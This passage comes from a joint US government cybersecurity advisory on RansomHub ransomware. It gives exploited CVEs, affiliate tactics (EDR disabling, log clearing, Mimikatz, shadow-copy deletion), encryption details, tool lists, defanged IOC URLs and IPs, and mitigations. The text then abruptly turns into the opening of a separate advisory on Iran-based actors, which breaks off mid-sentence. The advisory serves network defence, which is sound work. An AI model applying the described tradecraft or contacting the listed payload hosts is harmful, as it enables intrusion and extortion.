version 2.0.12 and below, version 1.2 all versions, version 1.1 all versions SSL-VPN may allow a remote attacker to execute arbitrary code or commands via specifically crafted requests. CVE-2023-46604 (CWE-502) The Java OpenWire protocol marshaller, such as in Apache ActiveMQ, is vulnerable to Remote Code Execution. This vulnerability may allow a remote attacker with network access to open either a Java-based OpenWire broker or client to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause either the client or the broker (respectively) to instantiate any class on the classpath. Upgrading both brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 fixes this issue. CVE-2023-22515 A vulnerability in publicly accessible Confluence Data Center and Server instances that allows the creation of unauthorized Confluence administrator accounts and access to Confluence instances. Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue. CVE-2023-46747 (CWE-306 | CWE-288) Undisclosed requests may bypass configuration utility authentication, allowing an attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. CVE-2023-48788 (CWE-89) An improper neutralization of special elements used in an SQL command (SQL injection') in Fortinet FortiClientEMS version 7.2.0 through 7.2.2 and FortiClientEMS 7.0.1 through 7.0.10 allows attacker to execute unauthorized code or commands via specially crafted packets. CVE-2017-0144 The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, also known as “Windows SMB Remote Code Execution Vulnerability” [T1210]. CVE-2020-1472 An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller using the Netlogon Remote Protocol (MS-NRPC). CVE-2020-0787 This vulnerability was also potentially exploited along with the Zerologon privilege escalation vulnerability. Discovery RansomHub affiliates conduct network scanning with tools such as AngryIPScanner, Nmap, and PowerShell-based living off the land methods with PowerShell to conduct network scanning [T1018][T1046][T1059.001]. Defense Evasion Cybersecurity researchers have observed affiliates renaming the ransomware executable with innocuous file names, such as Windows.exe, left on the user’s desktop (C:\Users\%USERNAME%\Desktop) or downloads (C:\Users\%USERNAME%\Downloads) [T1036]. The affiliates have also cleared Windows and Linux system logs to inhibit any potential incident response [T1070]. Affiliates used Windows Management Instrumentation [T1047] to disable antivirus products. In some instances, RansomHub-specific tools were deployed to disable endpoint detection and response (EDR) tooling [T1562.001]. Privilege Escalation and Lateral Movement Following initial access, RansomHub affiliates created user accounts for persistence [T1136], reenabled disabled accounts [T1098], and used Mimikatz [S0002] on Windows systems to gather credentials [T1003] and escalate privileges to SYSTEM [T1068]. Affiliates then moved laterally inside the network through methods including Remote Desktop Protocol (RDP) [T1021.001], PsExec [S0029], Anydesk [T1219], Connectwise, N-Able, Cobalt Strike [S0154], Metasploit, or other widely used command-and-control (C2) methods. Data Exfiltration Data exfiltration methods depend heavily on the affiliate conducting the network compromise. The ransomware binary does not normally include any mechanism for data exfiltration. Data exfiltration has been observed through the usage of tools such as PuTTY [T1048.002], Amazon AWS S3 buckets/tools [T1537], HTTP POST requests [T1048.003], WinSCP, Rclone, Cobalt Strike, Metasploit, and other methods. Encryption RansomHub ransomware has typically leveraged an Elliptic Curve Encryption algorithm called Curve 25519 to encrypt user accessible files on the system [T1486]. Curve 25519 uses a public/private key that is unique to each victim organization. To successfully encrypt files that are currently in use, the ransomware binary will typically attempt to stop the following processes: "vmms.exe" "msaccess.exe" "mspub.exe" "svchost.exe" "vmcompute.exe" "notepad.exe" "ocautoupds.exe" "ocomm.exe" "ocssd.exe" "oracle.exe" "onenote.exe" "outlook.exe" "powerpnt.exe" "explorer.exe" "sql.exe" "steam.exe" "synctime.exe" "vmwp.exe" "thebat.exe" "thunderbird.exe" "visio.exe" "winword.exe" "wordpad.exe" "xfssvccon.exe" "TeamViewer.exe" "agntsvc.exe" "dbsnmp.exe" "dbeng50.exe" "encsvc.exe" The ransomware binary will attempt to encrypt any files that the user has access to, including user files and networked shares. RansomHub implements intermittent encryption, encrypting files in 0x100000 byte chunks and skipping every 0x200000 bytes of data in between encrypted chunks. Files smaller than 0x100000 bytes in size are completely encrypted. Files are appended with 58 (0x3A) bytes of data at the end. This data contains a value which is likely part of an encryption/decryption key. The structure of the appended 0x3A bytes is listed below with images from three different encrypted files. Figure 1: The first eight bytes are the size of the encrypted file. The next eight bytes are the size of encrypted blocks. If the entire file is encrypted, this section is all zeros. In this example, each encrypted section is 0x100000 bytes long, with 0x100000 bytes between each encrypted block. This number was observed changing based on the size of the encrypted file. Figure 2: The size of encrypted blocks. The next two bytes were always seen to be 0x0001. Figure 3: The next two bytes are always 0x0001. The next 32 bytes are the public encryption key for the file. Figure 4: Public encryption key for the file. The next four bytes are a checksum value. Figure 5: Checksum value. The last four bytes are always seen to be the sequence 0x00ABCDEF. Figure 6: The last four bytes. The ransomware executable does not typically encrypt executable files. A random file extension is added to file names and a ransom note generally titled How To Restore Your Files.txt is left on the compromised system. To further inhibit system recovery, the ransomware executable typically leverages the vssadmin.exe program to delete volume shadow copies [T1490]. Leveraged Tools See Table 1 for publicly available tools and applications used by RansomHub affiliates. This includes legitimate tools repurposed for their operations. Disclaimer: Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control. Table 1: Tools Used by RansomHub Affiliates Tool Name Description BITSAdmin A command-line utility that manages downloads/uploads between a client and server by using the Background Intelligent Transfer Service (BITS) to perform asynchronous file transfers. Cobalt Strike [S0154] A penetration testing tool used by security professionals to test the security of networks and systems. RansomHub affiliates have used it to assist with lateral movement and file execution. Mimikatz [S0002] A tool that allows users to view and save authentication credentials such as Kerberos tickets. RansomHub affiliates have used it to aid privilege escalation. PSExec [S0029] A tool designed to run programs and execute commands on remote systems. PowerShell Cross-platform task automation solution made up of a command line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS. RClone A command line program used to sync files with cloud storage services. Sliver A penetration testing toolset which allows for remote command and control of systems. SMBExec A tool designed to manipulate SMB services for remote code execution. WinSCP Windows Secure Copy is a free and open source SSH File Transfer Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy protocol client. Affiliates have used it to transfer data from a compromised network to actor-controlled accounts. CrackMapExec Pentest Toolset Kerberoast Kerberos Brute force and Exploitation Tool AngryIPScanner Network Scanner Indicators of Compromise Disclaimer: Several of these IP addresses were first observed as early as 2020, although most date from 2022 or 2023 and have been historically linked to QakBot. The authoring organizations recommend organizations investigate or vet these IP addresses prior to taking action (such as blocking). See Table 2–Table 5 for IOCs obtained from FBI investigations. Table 2: Directory Structure TTPs Filename Description C:\Users\%USERNAME%\AppData\Local\Programs\Python\Python311\Scripts\crackmapexec.exe CrackMapExec C:\Users\%USERNAME%\AppData\Local\Programs\Python\Python311\Scripts\kerbrute.exe Kerberoasting C:\Users\%USERNAME%\Downloads\Anydesk.exe Anydesk C2 C:\Users\%USERNAME%\Desktop\IamBatMan.exe Ransomware C:\Users\backupexec\Desktop\stealer_cli_v2.exe Info Stealer C:\Users\%USERNAME%\Downloads\nmap-7.94-setup.exe Nmap C:\Program Files (x86)\Nmap\nmap.exe Nmap C:\Users\%USERNAME%\Downloads\mimikatz_trunk\x64\mimikatz.exe Mimikatz C:\Users\backupexec\Downloads\x64\mimikatz.exe Mimikatz Disclaimer: The authoring organizations recommend network defenders investigate or vet IP addresses prior to taking action, such as blocking. Many cyber actors are known to change IP addresses, sometimes daily, and some IP addresses may host valid domains. Table 3: Known IPs Related to Malicious Activity (2023-2024) IP Address 8.211.2[.]97 45.95.67[.]41 45.134.140[.]69 45.135.232[.]2 89.23.96[.]203 188.34.188[.]7 193.106.175[.]107 193.124.125[.]78 193.233.254[.]21 Table 4: Known URLs Related to Malicious Activity (2023-2024) Web Requests http[:]//188.34.188[.]7/555 http[:]//188.34.188[.]7/555/ http[:]//188.34.188[.]7/555/amba16.ico http[:]//188.34.188[.]7/555/bcrypt.dll http[:]//188.34.188[.]7/555/CRYPTSP.dll http[:]//188.34.188[.]7/555/en http[:]//188.34.188[.]7/555/en-US http[:]//188.34.188[.]7/555/NEWOFFICIALPROGRAMCAUSEOFNEWUPDATE.exe http[:]//188.34.188[.]7/555/NEWOFFICIALPROGRAMCAUSEOFNEWUPDATE.exe.Config http[:]//188.34.188[.]7/555/NEWOFFICIALPROGRAMCAUSEOFNEWUPDATE.INI http[:]//89.23.96[.]203/ http[:]//89.23.96[.]203/333 http[:]//89.23.96[.]203/333/ http[:]//89.23.96[.]203/333/1.exe http[:]//89.23.96[.]203/333/1.exe.Config http[:]//89.23.96[.]203/333/10.exe http[:]//89.23.96[.]203/333/12.exe http[:]//89.23.96[.]203/333/12.exe.Config http[:]//89.23.96[.]203/333/2.exe http[:]//89.23.96[.]203/333/2.exe.Config http[:]//89.23.96[.]203/333/2wrRR6sW6XJtsXyPzuhWhDG7qwN4es.exe http[:]//89.23.96[.]203/333/2wrRR6sW6XJtsXyPzuhWhDG7qwN4es.exe.Config http[:]//89.23.96[.]203/333/3.exe http[:]//89.23.96[.]203/333/3.exe.Config http[:]//89.23.96[.]203/333/4.exe http[:]//89.23.96[.]203/333/4.exe.Config http[:]//89.23.96[.]203/333/5.exe http[:]//89.23.96[.]203/333/5.exe.Config http[:]//89.23.96[.]203/333/6.exe http[:]//89.23.96[.]203/333/7.exe http[:]//89.23.96[.]203/333/8.exe http[:]//89.23.96[.]203/333/9.exe http[:]//89.23.96[.]203/333/92.exe http[:]//89.23.96[.]203/333/AmbaPDF.ico http[:]//89.23.96[.]203/333/ambapdf.ico.DLL http[:]//89.23.96[.]203/333/bcrypt.dll http[:]//89.23.96[.]203/333/Cabinet.dll http[:]//89.23.96[.]203/333/CRYPTBASE.DLL http[:]//89.23.96[.]203/333/cryptnet.dll http[:]//89.23.96[.]203/333/CRYPTSP.dll http[:]//89.23.96[.]203/333/cv4TCGxUjvS.exe http[:]//89.23.96[.]203/333/DPAPI.DLL http[:]//89.23.96[.]203/333/en http[:]//89.23.96[.]203/333/en/d%E5%AD%97%E5%AD%97.resources.dll http[:]//89.23.96[.]203/333/en/d%E5%AD%97%E5%AD%97.resources.exe http[:]//89.23.96[.]203/333/en/d%E5%AD%97%E5%AD%97.resources/d%E5%AD%97%E5%AD%97.resources.dll http[:]//89.23.96[.]203/333/en/d%E5%AD%97%E5%AD%97.resources/d%E5%AD%97%E5%AD%97.resources.exe http[:]//89.23.96[.]203/333/en-US http[:]//89.23.96[.]203/333/en-US/d%E5%AD%97%E5%AD%97.resources.dll http[:]//89.23.96[.]203/333/en-US/d%E5%AD%97%E5%AD%97.resources.exe http[:]//89.23.96[.]203/333/en-US/d%E5%AD%97%E5%AD%97.resources/d%E5%AD%97%E5%AD%97.resources.dll http[:]//89.23.96[.]203/333/en-US/d%E5%AD%97%E5%AD%97.resources/d%E5%AD%97%E5%AD%97.resources.exe http[:]//89.23.96[.]203/333/iertutil.dll http[:]//89.23.96[.]203/333/information.exe http[:]//89.23.96[.]203/333/information.exe.Config http[:]//89.23.96[.]203/333/information.INI http[:]//89.23.96[.]203/333/IPHLPAPI.DLL http[:]//89.23.96[.]203/333/mshtml.dll http[:]//89.23.96[.]203/333/msi.dll http[:]//89.23.96[.]203/333/SspiCli.dll http[:]//89.23.96[.]203/333/TmsLA6kdcU8jxKzpMvbUVweTeF5YcR.exe http[:]//89.23.96[.]203/333/TmsLA6kdcU8jxKzpMvbUVweTeF5YcR.exe.Config http[:]//89.23.96[.]203/333/2wrRR6sW6XJtsXyPzuhWhDG7qwN4es.exe http[:]//89.23.96[.]203/333/xwenxub285p83ecrzvft.exe http[:]//89.23.96[.]203/333/cv4TCGxUjvS.exe http[:]//89.23.96[.]203/333/urlmon.dll http[:]//89.23.96[.]203/333/USERENV.dll http[:]//89.23.96[.]203/333/webio.dll http[:]//89.23.96[.]203/333/winhttp.dll http[:]//89.23.96[.]203/333/WININET.dll http[:]//89.23.96[.]203/333/WINMM.dll http[:]//89.23.96[.]203/333/WINMMBASE.dll http[:]//89.23.96[.]203/333/winnlsres.dll http[:]//89.23.96[.]203/333/xwenxub285p83ecrzvft.exe http[:]//89.23.96[.]203/333/xwenxub285p83ecrzvft.exe.Config http[:]//temp.sh/KnCqD/superloop.exe https[:]//grabify.link/Y33YXP https[:]//i.ibb.co/2KBydfw/112882618.png https[:]//i.ibb.co/4g6jH2J/2773036704.png https[:]//i.ibb.co/b1bZBpg/2615174623.png https[:]//i.ibb.co/Fxhyq6t/2077411869.png https[:]//i.ibb.co/HK0jV1G/534475006.png https[:]//i.ibb.co/nbMNnW4/2501108160.png https[:]//i.ibb.co/p1RCtpy/2681232755.png https[:]//i.ibb.co/SxQLwYm/1038436121.png https[:]//i.ibb.co/v1bn9ZK/369210627.png https[:]//i.ibb.co/V3Kj1c2/1154761258.png https[:]//i.ibb.co/X2FR8Kz/2113791011.png https[:]//i.ibb.com:443/V3Kj1c2/1154761258.png https[:]//12301230[.]co/npm/module.tripadvisor/module.tripadvisor.css https[:]//12301230[.]co/npm/module.external/jquery.min.js https[:]//12301230[.]co/npm/module.external/moment.min.js https[:]//12301230[.]co/npm/module.external/client.min.js https[:]//12301230[.]co/npm/module.tripadvisor/module.tripadvisor.js https[:]//samuelelena[.]co/npm/module.tripadvisor/module.tripadvisor.js https[:]//samuelelena[.]co/npm/module.external/jquery.min.js https[:]//samuelelena[.]co/npm/module.external/moment.min.js https[:]//samuelelena[.]co/npm/module.external/client.min.js https[:]//samuelelena[.]co/ http[:]//samuelelena[.]co/ https[:]//samuelelena[.]co/npm https[:]//samuelelena[.]co/npm/module.tripadvisor/module.tripadvisor.js http[:]//samuelelena[.]co/npm/ http[:]//samuelelena[.]co/npm/module.tripadvisor/module.tripadvisor.js http[:]//samuelelena[.]co/npm/module.external/client.min.js https[:]//samuelelena[.]co/npm/module.tripadvisor/module.tripadvisor. https[:]//samuelelena[.]co/npm/module.external/jquery.min.js https[:]//samuelelena[.]co/npm/module.external https[:]//samuelelena[.]co/np https[:]/samuelelena[.]co/npm/module.tripadvisor/module.tripadvisor.js https[:]//samuelelena[.]co/npm/module[.]tripadvisor/module[.]tripadvisor[.]js https[:]//samuelelena[.]co/npm/module[.]external/client.min.js https[:]//samuelelena[.]co/npm/module.external/jquery.min.js http[:]//samuelelena[.]co:443/ http[:]//samuelelena[.]co/npm/module.external/jquery.min.js https[:]//40031[.]co/npm/module.tripadvisor/module.tripadvisor.css https[:]//40031[.]co/npm/module.external/jquery.min.js https[:]//40031[.]co/npm/module.external/moment.min.js https[:]//40031[.]co/npm/module.external/client.min.js https[:]//40031[.]co/npm/module.tripadvisor/module.tripadvisor.js Table 5: Emails Related to RansomHub (2023-2024) Email Addresses brahma2023[@]onionmail.org [@]protonmail.com MITRE ATT&CK Tactics and Techniques See Table 6–Table 17 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. Table 6: Resource Development Technique Title ID Use Obtain Capabilities: Exploits T1588.005 RansomHub affiliates may buy, steal, or download exploits that can be used during targeting. Table 7: Initial Access Technique Title ID Use Phishing T1566 RansomHub affiliates used mass phishing and spear-phishing emails to obtain initial access. Exploit Public-Facing Application T1190 RansomHub affiliates may exploit known vulnerabilities to obtain initial access. Table 8: Execution Technique Title ID Use Command and Scripting Interpreter T1059.001 RansomHub affiliates used PowerShell and Scripts to quickly run and automate intrusion. Windows Management Instrumentation T1047 RansomHub affiliates may abuse Windows Management Instrumentation to execute malicious commands and payloads. Table 9: Persistence Technique Title ID Use Command and Scripting Interpreter T1059.001 RansomHub affiliates used PowerShell and Scripts to quickly run and automate intrusion. Create Account T1136 RansomHub affiliates may create an account to maintain access to victim systems. Table 10: Privilege Escalation Technique Title ID Use Account Manipulation T1098 RansomHub affiliates may manipulate accounts to maintain and/or elevate access to victim systems. Remote Services: Remote Desktop Protocol T1021.001 RansomHub affiliates may log onto systems using the Remote Desk Protocol, then perform actions as the logged-on user. Table 11: Defense Evasion Technique Title ID Use Masquerading T1036 RansomHub affiliates may hide binaries by renaming executable names. Indicator Removal on Host T1070 RansomHub affiliates may remove logs to inhibit cybersecurity response. Impair Defenses: Disable or Modify Tools T1562.001 RansomHub affiliates may disable endpoint detection and response (EDR) tooling to avoid detection. Table 12: Credential Access Technique Title ID Use OS Credential Dumping T1003 RansomHub affiliates used Mimikatz on Windows systems to gather credentials. Brute Force: Password Spraying T1110.003 RansomHub affiliates may use password spraying to obtain initial access. Table 13: Discovery Technique Title ID Use Remote System Discovery T1018 RansomHub affiliates may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Network Service Discovery T1046 RansomHub affiliates may attempt to get a listing of services running on remote hosts and local network infrastructure devices, Table 14: Lateral Movement Technique Title ID Use Exploitation of Remote Services T1210 RansomHub affiliates may exploit remote service to gain unauthorized access to internal systems once inside of a network. Table 15: Command and Control Technique Title ID Use Remote Access Software T1219 RansomHub affiliates may use Anydesk, a legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. Table 16: Exfiltration Technique Title ID Use Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol T1048.002 RansomHub affiliates may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. Transfer Data to Cloud Account T1537 RansomHub affiliates may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service. Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Unencrypted Non-C2 Protocol T1048.003 RansomHub affiliates may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. Table 17: Impact Technique Title ID Use Data Encrypted for Impact T1486 RansomHub affiliates used encryption for ransomware operations. Inhibit System Recovery T1490 RansomHub ransomware deleted volume shadow copies and affiliates removed backups for ransomware operations. Incident Response If compromise is detected, organizations should: Quarantine or take potentially affected hosts offline. Reimage compromised hosts. Provision new account credentials. Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections. Report the compromise to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870). State, local, tribal, or territorial government entities can also report to the Multi-State Information Sharing and Analysis Center (MS-ISAC) (SOC@cisecurity.org or 866-787-4722). Mitigations Network Defenders The authoring organizations recommend organizations implement the mitigations below to improve cybersecurity posture based on RansomHub’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections. Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud). Require all accounts with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to comply with National Institute for Standards and Technology (NIST) standards for developing and managing password policies. Use longer passwords consisting of at least 8 characters and no more than 64 characters in length; Store passwords in hashed format using industry-recognized password managers; Add password user “salts” to shared login credentials; Avoid reusing passwords; Implement multiple failed login attempt account lockouts; Disable password “hints”; and Refrain from requiring password changes more frequently than once per year. Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher. Require administrator credentials to install software. Keep all operating systems, software, and firmware up to date [CPG 1.E]. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems. Require Phishing-Resistant multifactor authentication to administrator accounts [CPG 2.H] and require standard MFA for all services to the extent possible (particularly for webmail, virtual private networks, and accounts that access critical systems). Segment networks [CPG 2.F] to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement. Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool [CPG 3.A]. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host. Install, regularly update, and enable real time detection for antivirus software on all hosts. Implement Secure Logging Collection and Storage Practices [CPG 2.T]. Learn more about logging best practices by referencing CISA’s Logging Made Easy resources. Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts. Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege. Disable unused ports. Implement and enforce email security policies [CPG 2.M]. Disable macros by default [CPG 2.N]. Consider adding an email banner to emails received from outside your organization. Disable hyperlinks in received emails. Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task. Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally. Maintain offline backups of data, and regularly maintain backup and restoration [CPG 2.R]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data. Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure. Software Manufacturers The above mitigations apply to enterprises and critical infrastructure organizations with on-premises or hybrid environments. Recognizing that insecure software is the root cause of many of these flaws and that the responsibility should not be on the end user, CISA urges software manufacturers to implement the following to reduce the prevalence of identified or exploited issues (e.g., misconfigurations, weak passwords, and other weaknesses identified and exploited through the assessment team): Embed security into product architecture throughout the entire software development lifecycle (SDLC). Mandate MFA, ideally phishing-resistant MFA, for privileged users and make MFA a default, rather than opt-in, feature. These mitigations align with tactics provided in the joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software. CISA urges software manufacturers to take ownership of improving the security outcomes of their customers by applying these and other secure by design tactics. By using secure by design tactics, software manufacturers can make their product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing security software and logs, monitoring, and making routine updates. For more information on secure by design, see CISA’s Secure by Design webpage. Validate Security Controls In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring organizations recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (see Table 6–Table 17). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. CISA, FBI, MS-ISAC, and HHS recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. Resources #StopRansomware is a whole-of-government approach that gives one central location for ransomware resources and alerts. Resource to reduce the risk of a ransomware attack: #StopRansomware Guide. No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment. Health and Human Services HPH Cybersecurity Gateway hosts the HPH CPGs and links to HHS cybersecurity resources. References Ransomware Roundup - Knight | FortiGuard Labs (fortinet.com) Knight Ransomware - X-Industry - Red Sky Alliance Cyclops Ransomware and Stealer Combo: Exploring a Dual Threat (uptycs.com) Knight ransomware distributed in fake Tripadvisor complaint emails (bleepingcomputer.com) Reporting Your organization has no obligation to respond or provide information to the FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws. The FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators. The authoring organizations do not encourage paying a ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI’s Internet Crime Complain Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov) or by calling 1-844-Say-CISA (1-844-729-2472). Disclaimer The information in this report is being provided “as is” for informational purposes only. The authoring organizations do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring organizations.
Summary The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Defense Cyber Crime Center (DC3) are releasing this joint Cybersecurity Advisory (CSA) to warn network defenders that, as of August 2024, a group of Iran-based cyber actors continues to exploit U.S. and foreign organizations. This includes organizations across several sectors in the U.S. (including in the education, finance, healthcare, and defense sectors as well as local government entities) and other countries (including in Israel, Azerbaijan, and the United Arab Emirates). The FBI assesses a significant percentage of these threat actors’ operations against US organizations are intended to obtain and develop network access to then collaborate with ransomware affiliate actors to deploy ransomware. The FBI further assesses these Iran-based cyber actors are associated with the Government of Iran (GOI) and—separate from the ransomware activity—conduct computer network exploitation activity in support of the GOI (such as intrusions enabling the theft of sensitive technical data against organizations in Israel and Azerbaijan). This CSA provides the threat actor’s tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs), as well as highlights similar activity from a previous advisory (Iran-Based Threat Actor Exploits VPN Vulnerabilities) that the FBI and CISA published on Sept. 15, 2020. The information and guidance in this advisory are derived from FBI investigative activity and technical analysis of this group’s intrusion activity against U.S. organizations and engagements with numerous entities impacted by this malicious activity. The FBI recommends all organizations follow guidance provided in the Mitigations section of this advisory to defend against the Iranian cyber actors’ activity. If organizations believe they have been targeted or compromised by the Iranian cyber actors, the FBI and CISA recommend immediately contacting your local FBI field office for assistance and/or reporting the incident via CISA’s Incident Reporting Form (see the Reporting section of this advisory for more details and contact methods). For more information on Iran state-sponsored malicious cyber activity, see CISA’s Iran Cyber Threat webpage. Download the PDF version of this report: AA24-241A Iran-based Cyber Actors Enabling Ransomware Attacks on US Organizations (PDF, 582.01 KB ) For a downloadable copy of IOCs, see: AA24-241A STIX XML (XML, 29.02 KB ) AA24-241A STIX JSON (JSON, 29.19 KB ) Threat Actor Details Background on Threat Group and Prior Activity This advisory outlines activity by a specific group of Iranian cyber actors that has conducted a high volume of computer network intrusion attempts against U.S. organizations since 2017 and as recently as August 2024. Compromised organizations include U.S.-based schools, municipal governments, financial institutions, and healthcare facilities. This group is known in the private sector by the names Pioneer Kitten, Fox Kitten, UNC757, Parisite, RUBIDIUM, and Lemon Sandstorm.[1][2] The actors also refer to themselves by the moniker Br0k3r, and as of 2024, they have been operating under the moniker “xplfinder” in their channels. FBI analysis and investigation indicate the group’s activity is consistent with a cyber actor with Iranian state-sponsorship. The FBI previously observed these actors attempt to monetize their access to victim organizations on cyber marketplaces. A significant percentage of the group’s US-focused cyber activity is in furtherance of obtaining and maintaining technical access to victim networks to enable future ransomware attacks. The actors offer full domain control privileges, as well as domain admin credentials, to numerous networks worldwide. More recently, the FBI identified these actors collaborating directly with ransomware affiliates to enable encryption operations in exchange for a percentage of the ransom payments. These actors have collaborated with the ransomware affiliates NoEscape[3], Ransomhouse[4], and ALPHV (aka BlackCat) (#StopRansomware: ALPHV Blackcat). The Iranian cyber actors’ involvement in these ransomware attacks goes beyond providing access; they work closely with ransomware affiliates to lock victim networks and strategize on approaches to extort victims. The FBI assesses these actors do not disclose their Iran-based location to their ransomware affiliate contacts and are intentionally vague as to their nationality and origin. Furthermore, the FBI has historically observed this actor conduct hack-and-leak campaigns, such as the late 2020 campaign known as Pay2Key.[5],[6] The actors operated a .onion site (reachable through the Tor browser) hosted on cloud infrastructure registered to an organization previously compromised by the actors. (The actors created the server leveraging their prior access to this victim.) Following the compromise and the subsequent unauthorized acquisition of victim data, the actors publicized news of their compromise (including on social media), tagging accounts of victim and media organizations, and leaking victim data on their .onion site. While this technique has traditionally been used to influence victims to pay ransoms, the FBI does not believe the objective of Pay2Key was to obtain ransom payments. Rather, the FBI assesses Pay2Key was an information operation aimed at undermining the security of Israel-based cyber infrastructure. Attribution Details FBI investigation identified that the Iranian cyber actors conduct malicious cyber activity, which FBI assessed to be in support of the GOI. The FBI judges this activity to be separate from the previously referenced ransomware-enabling activity. This group directs their activity towards countries and organizations consistent with Iranian state interests, and typically not of interest to the group’s ransomware affiliate contacts, such as U.S. defense sector networks, and those in Israel, Azerbaijan, United Arab Emirates. Instead, it is intended to steal sensitive information from these networks, suggesting the group maintains an association with the GOI. However, the group’s ransomware activities are likely not sanctioned by the GOI, as the actors have expressed concern for government monitoring of cryptocurrency movement associated with their malicious activity. The group uses the Iranian company name Danesh Novin Sahand (identification number 14007585836), likely as a cover IT entity for the group’s malicious cyber activities. Technical Details Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 15.1. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. Overview of Observed Tactics, Techniques, and Procedures The Iranian cyber actors’ initial intrusions rely upon exploits of remote external services on internet-facing assets to gain initial access to victim networks. As of July 2024, these actors have been observed scanning IP addresses hosting 